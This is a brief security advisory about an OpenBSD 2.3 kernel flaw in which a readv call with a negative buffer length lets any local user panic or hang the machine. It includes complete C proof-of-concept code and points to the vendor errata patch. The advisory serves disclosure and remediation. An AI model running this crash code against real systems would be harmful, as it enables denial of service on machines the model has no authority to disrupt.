COMMAND

    kernel (readv)

SYSTEMS AFFECTED

    OpenBSD 2.3

PROBLEM

    Jon Ribbens found following.  readv with one of the blocks  having
    a -ve size panics the kernel. To repeat that, use following  code.
    Run  the  program,  type  a  few characters, press return, observe
    either  kernel   panic  or   machine  hang.    Panic  message   is
    "panic: ureadc:  non-positive resid". Any user can do this.

    #include <sys/types.h>
    #include <sys/uio.h>
    #include <unistd.h>

    int main(void) {
      struct iovec iov[1];
      char buffer[1024];

      iov[0].iov_base = buffer;
      iov[0].iov_len = -1;

      return readv(0, iov, 1);
    }

SOLUTION

    See

        http://www.openbsd.org/errata.html#resid

    for a patch which applies to 2.3.